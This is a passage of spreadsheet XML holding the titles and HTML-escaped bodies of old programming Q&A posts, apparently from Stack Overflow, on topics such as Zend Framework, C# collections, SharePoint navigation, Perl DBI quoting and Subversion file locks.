&lt;p&gt;Can you give some advice on the subject? Will any of the alternatives cause grief in the longer run?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Zend framework; Getting controller to use different viewer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using the Zend Framework.&lt;/p&gt;
&lt;p&gt;I have a controller named 'UserController' that has a public function displayAction().&lt;/p&gt;
&lt;p&gt;I would like to know how I can get that action method to use a different viewer than the default display.phtml.&lt;/p&gt;
&lt;p&gt;Any help is appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Acegi Security: How do i add another GrantedAuthority to Authentication to anonymous user</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i give users special URL with access key in it. users accessing the public page via this special url should be able to see some additional data as compared to simple anonymous user. &lt;/p&gt;
&lt;p&gt;i want to give some additional role to anonymous user based on parameters provided in request so i can do something like this in my template:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;@sec.authorize ifAnyGranted="ROLE_ADMIN, ROLE_USER, ROLE_INVITED_VISITOR"&amp;gt;
...some additional stuff for invited user to see
&amp;lt;/@sec.authorize&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;currently i'm implementing Spring's &lt;code&gt;OncePerRequestfilter&lt;/code&gt;:&lt;/p&gt;
&lt;pre class="lang-java prettyprint-override"&gt;&lt;code&gt;protected void doFilterInternal(HttpServletRequest request, HttpServletResponse response, FilterChain chain) throws ServletException, IOException {
    if (null != request.getParameter("accessKey")) {
        if(isValid(request.getParameter("accessKey"))) {
            Authentication auth = SecurityContextHolder.getContext().getAuthentication();
            //how do i add additional roles to authenticated (potentially anonymous) user?
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Include another MSI file in my setup project</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to make a setup program for an ASP.NET web site. I need to make sure the target machine has sqlxml installed.&lt;/p&gt;
&lt;p&gt;I must verify the target machine has the software installed, and if not, launch a .msi file either before or after the main installation.&lt;/p&gt;
&lt;p&gt;I'm a complete newbie with setup projects, so maybe this is obvious, but after several hours browsing the web I haven't found a satisfactory solution. I've been reading about &lt;a href="http://en.wikipedia.org/wiki/WiX" rel="nofollow"&gt;WiX&lt;/a&gt;, etc. but I'm looking (if possible) for a simple solution.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Thank you both!&lt;/p&gt;
&lt;p&gt;I understand an installer can't run another one. I was thinking in a functionality similar to Prerequisites (in project properties). There I can check a component and it will be automatically installed if it isn't. I don't need to do anything else. But, the most important thing for me is that the installation won't run if it's not needed.&lt;/p&gt;
&lt;p&gt;I also tried the .msm solution, but I couldn't find any. Maybe I can make one myself? I haven't tried it yet though.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using foreach (...) syntax while also incrementing an index variable inside the loop</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When looking at C# code, I often see patterns like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DataType[] items = GetSomeItems();
OtherDataType[] itemProps = new OtherDataType[items.Length];
int i = 0;
foreach (DataType item in items)
{
    // Do some stuff with item, then finally
    itemProps[i] = item.Prop;
    i++;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The for-loop iterates over the objects in &lt;code&gt;items&lt;/code&gt;, but also keeping a counter (&lt;code&gt;i&lt;/code&gt;) for iterating over &lt;code&gt;itemProps&lt;/code&gt; as well. I personally don't like this extra &lt;code&gt;i&lt;/code&gt; hanging around, and instead would probably do something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DataType[] items = GetSomeItems();
OtherDataType[] itemProps = new OtherDataType[items.Length];
for (int i = 0; i &amp;lt; items.Length; i++)
{
    // Do some stuff with items[i], then finally
    itemProps[i] = items[i].Prop;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there perhaps some benfit to the first approach I'm not aware of? Is this a result of everybody trying to use that fancy &lt;code&gt;foreach (...)&lt;/code&gt; syntax? I'm interested in your opinions on this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Transforming selected text with a hotkey</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this code:&lt;/p&gt;
&lt;p&gt;myVariable&lt;/p&gt;
&lt;p&gt;which I want to change into&lt;/p&gt;
&lt;p&gt;trace("myVariable: " + myVariable);&lt;/p&gt;
&lt;p&gt;using a direct hotkey like &lt;kbd&gt;alt&lt;/kbd&gt; - &lt;kbd&gt;f12&lt;/kbd&gt; to do it. I.e not using &lt;kbd&gt;ctrl&lt;/kbd&gt; - &lt;kbd&gt;space&lt;/kbd&gt; and arrow buttons.&lt;/p&gt;
&lt;p&gt;is it possible in eclipse?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using Volume Shadow Copy Service (VSS) in Delphi</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone have sample code to copy open (in-use and locked by another program) files using Volume Shadow Copy Service (VSS) API?&lt;/p&gt;
&lt;p&gt;There was an article about this in The Delphi Magazine (September 2005). But that code is no longer available and even if it was, it's not current.&lt;/p&gt;
&lt;p&gt;I am looking for sample code that works with current version of Volume Shadow Copy service libraries.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to redirect to the requested URI after authentication using Zend_Auth?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using a simple &lt;a href="http://framework.zend.com/manual/en/zend.auth.html"&gt;Zend_Auth&lt;/a&gt; setup to authenticate users for one of my applications, using a check in the preDispatch() method in a &lt;a href="http://framework.zend.com/manual/en/zend.controller.plugins.html"&gt;controller plugin&lt;/a&gt;. When anonymous users navigate to &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/users/view/id/6
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;for example, they should be redirected to the above URI after authentication.&lt;/p&gt;
&lt;p&gt;What is the best way to do this? I'd prefer not to store &lt;code&gt;$_SERVER['REQUEST_URI']&lt;/code&gt; in the session. Personally, I'd find storing the entire Zend Request object to cleanest solution, but I am not sure if this is sensible and if this is the approach I should be taking.&lt;/p&gt;
&lt;p&gt;Any thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Building my first ASP application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've just been tasked with building a web application using ASP (.net) and am looking for some advice on where to start.   In a nutshell the application needs to be able to.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Handle user verification / authentication&lt;/li&gt;
&lt;li&gt;Handle sessions&lt;/li&gt;
&lt;li&gt;Do SOAP messaging&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The application is intended to act as a front end for system functions that are accessible via web service calls.&lt;/p&gt;
&lt;p&gt;I intend to do a lot of work on the client side using JavaScript and am thinking of using ASP solely as the framework for the 3 items I listed above.&lt;/p&gt;
&lt;p&gt;Appreciate any suggestions you may have.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get a ReadOnlyCollection&lt;T&gt; of the Keys in a Dictionary&lt;T, S&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My class contains a &lt;code&gt;Dictionary&amp;lt;T, S&amp;gt; dict&lt;/code&gt;, and I want to expose a &lt;code&gt;ReadOnlyCollection&amp;lt;T&amp;gt;&lt;/code&gt; of the keys. How can I do this without copying the &lt;code&gt;Dictionary&amp;lt;T, S&amp;gt;.KeyCollection dict.Keys&lt;/code&gt; to an array and then exposing the array as a &lt;code&gt;ReadOnlyCollection&lt;/code&gt;?  &lt;/p&gt;
&lt;p&gt;I want the  &lt;code&gt;ReadOnlyCollection&lt;/code&gt; to be a proper wrapper, ie. to reflect changes in the underlying Dictionary, and as I understand it copying the collection to an array will not do this (as well as seeming inefficient - I don't actually want a new collection, just to expose the underlying collection of keys...). Any ideas would be much appreciated!&lt;/p&gt;
&lt;p&gt;Edit: I'm using C# 2.0, so don't have extension methods such as .ToList (easily) available.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>NAnt extension function, Project object</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to access the &lt;code&gt;Project&lt;/code&gt; object from a NAnt extension function, as can be done from an extension task?&lt;/p&gt;
&lt;p&gt;In this example, I want to use the &lt;code&gt;BaseDirectory&lt;/code&gt; property inside the &lt;code&gt;Bar&lt;/code&gt; function:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[FunctionSet("foo", "Foo")]
public class FooFunctions : FunctionSetBase
{
	public FooFunctions(Project project, PropertyDictionary properties)
		: base(project, properties)
	{
		// When does this constructor gets called?
	}
	[Function("bar")]
	public static string Bar(string name)
	{
		return "Bar!"; // How to get at project.BaseDirectory?
	}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm new to NAnt extensions, so I don't know if this is even a valid question or if I should approach the problem differently.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is Vista Ultimate 64 w/SP1 okay for a development machine?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am updating my rig and I need to make a decision between staying with XP x64 or going to Vista x64. I do very little development, really just building products from my developers. The other 90% of my work is done with Google Apps, Skype, Office, etc...&lt;/p&gt;
&lt;p&gt;I want to upgrade to Vista not only because I will have 3x monitors running on DirectX10, but mostly because iTunes isnt' supported on XP x64!&lt;/p&gt;
&lt;p&gt;So, my question...&lt;/p&gt;
&lt;p&gt;With all the horror stories about Vista, will Vista Ultimate x64 with 8GB RAM be good for my development machine? &lt;/p&gt;
&lt;p&gt;If I can't develop on Vista, I can always fire open a VPC to do the development in. No?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I am using all Microsoft development tools...   &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;VS.NET 2005&lt;/li&gt;
&lt;li&gt;VS.NET 2008&lt;/li&gt;
&lt;li&gt;VB6&lt;/li&gt;
&lt;li&gt;SQL Server 2005/2008&lt;/li&gt;
&lt;li&gt;ASP.NET&lt;/li&gt;
&lt;li&gt;(.NET 2.0 &amp;amp; .NET 3.0)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I'm sure the software will run, I suppose I am not so sure that the OS will be speedy enough, or stable enough. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Iterate though Generic List in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;public class Item
{
        private int  _rowID;
        private Guid _itemGUID;
        public Item() { }
        public int Rid
        {
            get
            {
                return _rowID;
            }
            set {  }
        }
        public Guid IetmGuid
        {
            get
            {
                return _itemGuid;
            }
            set
            {
                _itemGuid= value;
            }
        }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The above is my custom object.&lt;/p&gt;
&lt;p&gt;I have a list:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;List&amp;lt;V&amp;gt; myList = someMethod;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;where V is of type Item, my object.&lt;/p&gt;
&lt;p&gt;I want to iterate and get the properties as such&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;foreach(V element in mylist)
{
   Guid test = element.IetmGuid; 
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I debug and look at the 'element' object I can see all the properties in the 'Quickwatch' but I cannot do element.IetmGuid.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to share config settings between mutiple applications</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a project where there are multiple applications that have some common configuration values. I would like to have a shared .config file that is available to all of the applications using the .Net configuration object model. Each application would also have its own app.config file&lt;/p&gt;
&lt;p&gt;How can this best be done. I'd rather avoid using the registry as much as possible. In looking through the documentation, the OpenExeConfiguration(string exePath) method seems promising for accessing a specified config file. Is this a reasonable approach? Any other suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Compact Framework - System.Threading.Timer stops when the user turns off the screen</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an application that needs to "poll" a webservice to see if the user has any new messages waiting.  I have no control over the webservice so I cannot switch to a "push" mechanism, I'm stuck making a request every X number of seconds to see what's available.&lt;/p&gt;
&lt;p&gt;I am using a System.Threading.Timer to make the request every so often, but am encountering a few problems.  The biggest is that it stops running when the phone is sent into "standby" mode (screen off, but still able to get calls and email/txt notifications).  &lt;/p&gt;
&lt;p&gt;I'd really like it to behave like other background applications.  What can I do to make it work without being too big of a drain on the battery?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Infragistics grid "on-demand" appearance</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're using Infragistics grid (most probably, we'll have 8.2 version at the end) and we want to configure row/cells appearances "on-demand" in order to be able to provide sort of "dynamic appearance".&lt;/p&gt;
&lt;p&gt;For example, I want some cell to be red or green, depending on its value. We might want to tweak other characteristics as well (font, size, image, etc).&lt;/p&gt;
&lt;p&gt;A perfect place to do it would be some event, that happen before a cell gets repainted... But it seems there is no such event in Infragistics...&lt;/p&gt;
&lt;p&gt;Or am I wrong? Any help?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Clarification:&lt;/strong&gt; I'm talking about WinForms Infragistics UltraGrid&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MOSS SpNavigationNode.Children always empty</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to return all the child nodes of a set of navigation nodes in sharepoint, the SDK implies I should be doing something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;NodeColl = objSite.Navigation.TopNavigationBar 
Dim Node as SPNavigationNode
For Each Node In NodeColl
  if Node.IsVisible then
    Response.Write("&amp;lt;siteMapNode url=""" &amp;amp; Node.Url &amp;amp; """ title=""" &amp;amp; Node.Title &amp;amp; """  description=""" &amp;amp; Node.Title &amp;amp; """ &amp;gt;" &amp;amp; Environment.NewLine)
    Dim SubChildNodes as SPNavigationNodeCollection = Node.Children
    Response.Write(SubChildNodes.Count) 'returns 0 always even though I know theres over 20 nodes in some of the sections
    Dim ChildNode as SPNavigationNode
    For Each ChildNode in SubChildNodes
      if ChildNode.IsVisible then
        Response.Write("&amp;lt;siteMapNode url=""" &amp;amp; ChildNode.Url &amp;amp; """ title=""" &amp;amp; ChildNode.Title &amp;amp; """  description=""" &amp;amp; ChildNode.Title &amp;amp; """ /&amp;gt;" &amp;amp; Environment.NewLine)
      End if
    Next
    Response.Write("&amp;lt;/siteMapNode&amp;gt;" &amp;amp; Environment.NewLine)
  End If
Next
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;however whenever I do, it lists the top level navigation nodes but I cannot get the children to be displayed.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>&lt;assemblyBinding&gt; ignored in parent web.config</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a folder containing several websites, all using the same assemblies in the GAC. Each website also contains some 'custom' assemblies of their own that refer to the common assemblies.&lt;/p&gt;
&lt;p&gt;There is a web.config in this folder, defining common settings for the sites, including the assemblies to load in a &lt;strong&gt;&lt;em&gt;&amp;lt;system.web&amp;gt;/&amp;lt;compilation&amp;gt;/&amp;lt;assemblies&amp;gt;&lt;/em&gt;&lt;/strong&gt; element.&lt;/p&gt;
&lt;p&gt;What I want to be able to do is add a &lt;strong&gt;&lt;em&gt;&amp;lt;runtime&amp;gt;/&amp;lt;assemblyBinding&amp;gt;&lt;/em&gt;&lt;/strong&gt; section to redirect requests from the older 'custom' assemblies to the newer ones installed in the GAC. (Unfortunately, using machine.config or the GAC redirection policy aren't options as this will affect other sites.)&lt;/p&gt;
&lt;p&gt;It seems that the &lt;strong&gt;&lt;em&gt;&amp;lt;assemblyBinding&amp;gt;&lt;/em&gt;&lt;/strong&gt; section is ignored unless it is in the website's own web.config, or the machine.config.&lt;/p&gt;
&lt;p&gt;I've already come across the &lt;strong&gt;&lt;em&gt;&amp;lt;configuration xmlns="http://schemas.microsoft.com/.NetConfiguration/v2.0"&amp;gt;&lt;/em&gt;&lt;/strong&gt; problem so I know it's not that.&lt;/p&gt;
&lt;p&gt;Does anyone know if this is what is supposed to happen or am I missing something?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>(DataGridView + Binding)How to color line depending of the object binded?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to add a backcolor for specific line depending of a Property of the object binded.&lt;/p&gt;
&lt;p&gt;The solution I have (and it works) is to use the Event &lt;code&gt;DataBindingComplete&lt;/code&gt; but I do not think it's the best solution.&lt;/p&gt;
&lt;p&gt;Here is the event:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    private void myGrid_DataBindingComplete(object sender, DataGridViewBindingCompleteEventArgs e)
    {
        for (int i = 0; i &amp;lt; this.myGrid.Rows.Count; i++)
        {
            if((this.myGrid.Rows[i].DataBoundItem as MyObject).Special)
            {
                this.myGrid.Rows[i].DefaultCellStyle.BackColor = Color.FromArgb(240, 128, 128);
            }
        }
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any other option that would be better?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WindowsPrincipal.IsInRole() not returning the expected result</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So here's my current code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;List&amp;lt;string&amp;gt; rowGroups = GetFileGroups((int)row.Cells["document_security_type"].Value);
bool found = false;
System.Security.Principal.WindowsPrincipal p = new System.Security.Principal.WindowsPrincipal(System.Security.Principal.WindowsIdentity.GetCurrent());
foreach (string group in rowGroups)
{
  if (p.IsInRole(group))
  {
    found = true;
    break;
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This was done a couple of months ago by someone and I'm having difficulty grasping why its not working. The company has recently just moved from one domain name to another. So I was curious to what domain controller the p.IsInRole("String") function will use. I'm assuming its going to use the default DC by whatever the computer is using.&lt;/p&gt;
&lt;p&gt;The odd item is that the computers in the office where this is running could be on 2 seperate domains. In the &lt;code&gt;List&amp;lt;string&amp;gt;&lt;/code&gt; object, i've got both domains possible. so it could contain items such as "domainA\groupA", "domainA\userB", domainB\groupC", and/or "domainB\userD".&lt;/p&gt;
&lt;p&gt;So my major problem is that the IsInRole function is never returning true. i know it should, i even tested it with domainA\Domain users and still get a false returned.&lt;/p&gt;
&lt;p&gt;Any ideas? changing the code is possible, but not wanted. i'm not 100% i can even compile it...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it a bad idea to get rid of the mx: in your Flex code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am a newbie at Flex, and I don't like the way you have to write the namespace mx: for every control declaration you write. It makes the code cluttery. I would like to write:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Panel ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;rather than&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;mx:Panel ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I tried writing&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;xmlns="http://www.adobe.com/2006/mxml"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;for the top level element instead of &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;xmlns:mx="http://www.adobe.com/2006/mxml"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In the top level declaration. This work to an extent, but broke some existing code. For one, XML data that are defined in the document are all appended with aaa: as the namespace during runtime. I've also noticed other issues in my very small sample program.&lt;/p&gt;
&lt;p&gt;Is there a way to do this that works, or is this a lost cause? And some background information on why would be appreciated.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Update: Thanks all for the replies, but I would like to have heard from someone who actually tried this and thought it was important. Although most of you told me it was a bad idea, I was not discouraged. I got a couple of programs working this way smoothly now. And plan to do this in all my flex apps. One trick seemed to work for me although I can't claim it'll work universally. If you need  separate namespaces within your doc, take, HTTPService parameters for example, you could create a namespace within that element like so:&lt;/em&gt;&lt;/p&gt;
&lt;pre&gt;
    &amp;lt;HTTPService id=&amp;quot;service&amp;quot; url=&amp;quot;http://blah.com&amp;quot;
        method=&amp;quot;POST&amp;quot; result=&amp;quot;gotResult(event)&amp;quot;&amp;gt;
        &amp;lt;request xmlns:p=&amp;quot;*&amp;quot;&amp;gt;
            &amp;lt;p:param1&amp;gt;p1&amp;lt;/p:param1&amp;gt;
            &amp;lt;p:param2&amp;gt;p2&amp;lt;/p:param2&amp;gt;
        &amp;lt;/request&amp;gt;
    &amp;lt;/HTTPService&amp;gt;
&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;Hope this helps someone. I am very happy with how clean my code is now, almost as clean as a normal html file. As for people who think writing mx: throughout your code is clearer and what not, I disagree completely. I think languages that require you to repeat the same character sequence excessively in your code - which you should consider a document - have  design flaws. Here's an analogy for you: how would you like it if you were reading an article on Barack Obama, and every single sentence contained the words 'Barack Obama', that would get pretty tiresome wouldn't it?&lt;/em&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I pass a string parameter greater than varchar(8000) in SQL Server 2000?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;You get a compilation error if you define the string parameter to have a size greater than 8000&lt;/p&gt;
&lt;p&gt;e.g. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;The size (9000) given to the type 'varchar' exceeds the maximum allowed for any data type (8000).
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I insert strings with quotes into Perl DBI queries?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the preferred way to insert strings that can contain both single and double quotes (",') into MySql using DBI?  For example, &lt;code&gt;$val1&lt;/code&gt; and &lt;code&gt;$val2&lt;/code&gt; can contain quotes:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;my $dbh = DBI-&amp;gt;connect( ... );
my $sql = "insert into tbl_name(col_one,col_two) values($val1, $val2)";
my $sth = $dbh-&amp;gt;prepare($sql);
$sth-&amp;gt;execute();
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Simple Excel Applescript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am new to Applescripts and Excel 08?  I want to write one that colors arbitrarily preselected cells in Excel 08 specific colors. I can get it to  write want in an preselected cell and even bold the font...but for some reason it will not change the color of the cell...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;print("Tell application "Microsoft Excel"
activate
set formula of active cell to "excellent answer"
set bold of font object of active cell to true
activate cell active cell");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This part doesn't work for some reason`&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;print("tell interior object of active cell of active sheet
	set color index to 3
	set pattern to pattern gray 50
	set pattern color index to 13
end tell");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;not sure why&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can MOSS 32 bit and 64 bit exist in the same farm?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to setup a failover location for MOSS. The current farm is built on 32 bit Windows 2003. The servers ar the failover location are all 64 bit Windows 2008.&lt;/p&gt;
&lt;p&gt;Is there any way to make these two environments talk and stay in sync? I have considered a "stretched" farm configuration, but that won't work unles the bit width of both locations are the same.&lt;/p&gt;
&lt;p&gt;The current database server for MOSS is replicated to our failover location using clustering and is visible at both locations.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to see what files are locked in Subversion?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I finally got my group to switch from SourceSafe to Subversion.  Unfortunately, my manager still wants to use exclusive locks on every single file.  So I set the svn:needs-lock property on every file and created a pre-commit hook to make sure the property stays set.&lt;/p&gt;
&lt;p&gt;We are running Subversion on a Linux server.  Most of us use Windows machines and a few use Macs.  We are using various SVN clients (TortoiseSVN, SmartSVN, Subclipse, etc.).  &lt;/p&gt;
&lt;p&gt;What we now need is a good/easy method to see all the files that are currently locked in the entire repository (and who has them locked).  I have poked around a little in Tortoise and Subclipse, but haven't found what I am looking for.  Our projects have many subdirectories that are multiple levels deep, so it would be too time consuming to look at each individual directory.  &lt;/p&gt;
&lt;p&gt;What I would like is a single report I can run that lists everything that is currently locked and who has it locked.  What is the best way to get this type of information?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you read a byte array from a DataRow in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a &lt;code&gt;DataSet&lt;/code&gt; with a &lt;code&gt;DataTable&lt;/code&gt; that correctly fills a single &lt;code&gt;DataRow&lt;/code&gt; through a &lt;code&gt;TableAdapter&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I am able to pull data from the DataRow with code like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dataFileID = (int)this.dataFileDataRow["DataFileID"];
dataFileName = (string)this.dataFileDataRow["DataFileName"];
dataFileDate = (DateTime)this.dataFileDataRow["DataFileDate"];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have another column called DataFile of type &lt;code&gt;varbinary(max)&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;When I try to pull that column's data from the same &lt;code&gt;DataRow&lt;/code&gt; as above I get nothing.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;byte[] fileFromDatabase = (byte[])this.dataFileDataRow["DataFile"];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I put a break point at this location, I can look into the dataFileDataRow, look into the ItemArray property and see that the binary data is sitting at position 5 in the ItemArray.&lt;/p&gt;
&lt;p&gt;I have tried access the ItemArray directly using its index but the byte array is not being copied to the fileFromDatabase variable.  &lt;/p&gt;
&lt;p&gt;I have also noticed that adding fileFromDatabase to my watch produces this error:         &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;"The name 'fileFromDatabase' does not exist in the current context"&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The execution is still in the same block as the definition of fileFromDatabase so I do not understand how it would be out of context.&lt;/p&gt;
&lt;p&gt;I had Visual Studio's configuration set to Release instead of Debug.  This was causing me to not see the real time debugging information I was looking for when trying to examine fileFromDatabase.  After switching from Release to Debug, I am able to see the variable in the watch now and can verify that the code above is working correctly.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Upload large files in .NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've done a good bit of research to find an upload component for .NET that I can use to upload large files, has a progress bar, and can resume the upload of large files.  I've come across some components like &lt;a href="http://ajaxuploader.com"&gt;AjaxUploader&lt;/a&gt;, &lt;a href="http://krystalware.com/products/slickupload/Default.aspx"&gt;SlickUpload&lt;/a&gt;, and &lt;a href="http://www.element-it.com/PowUpload.ASPX"&gt;PowUpload&lt;/a&gt;, to name a few.  Each of these options cost money and only PowUpload does the resumable upload, but it does it with a java applet.  I'm willing to pay for a component that does those things well, but if I could write it myself that would be best.&lt;/p&gt;
&lt;p&gt;I have two questions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Is it possible to resume a file upload on the client without using flash/java/Silverlight?&lt;/li&gt;
&lt;li&gt;Does anyone have some code or a link to an article that explains how to write a .NET HTTPHandler that will allow streaming upload and an ajax progress bar?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Thank you,&lt;br /&gt;
Austin&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;[Edit]&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I realized I do need to be able to do resumable file uploads for my project, any suggestions for components that can do that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Open a .BAS DTS Package in SQL 2000?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;You can save a SQL Server 2000 DTS package as a VB .BAS file.  Is is possible to open a .BAS file in SQL Server Enterprise Manager (or some other way) to add the DTS package to the server?  Initally, it appears that SQL Server only lets you import .DTS files.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can Boost Spirit be used to parse byte stream data?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can Spirit (part of Boost C++ library) be used to parse out binary data coming from a stream?  For example, can it be used to parse data coming from a socket into structures, bytes, and individual bit flags?  Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Trying to send an HTTP request over sockets</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having trouble sending out a simple HTTP request using Actionscript 3's Socket() object. My onConnect listener is below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function sConnect(e:Event):void {
    trace('connected');
    s.writeUTFBytes('GET /outernet/client/rss/reddit-feeds HTTP/1.1\r\n');
    s.writeUTFBytes('Host: 208.43.71.50:8080\r\n');
    s.writeUTFBytes('Connection: Keep-alive\r\n');
    s.flush();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Using a packet sniffer, I can see the request does indeed get sent to the server, but the packet sniffer doesn't identify the protocol as HTTP like it does with other HTTP services. When I run this, the server just eventually disconnects me. I have tried to connect to other simple Apache Servers and just get a malformed request error.&lt;/p&gt;
&lt;p&gt;What am I missing here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Converting Plain Text to Clickable link or Link to PlainText in asp.net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need your advice with converting plain text to an URL.&lt;/p&gt;
&lt;p&gt;The scenario will be this: The user will select some entry and then click a "convert to link" button. &lt;/p&gt;
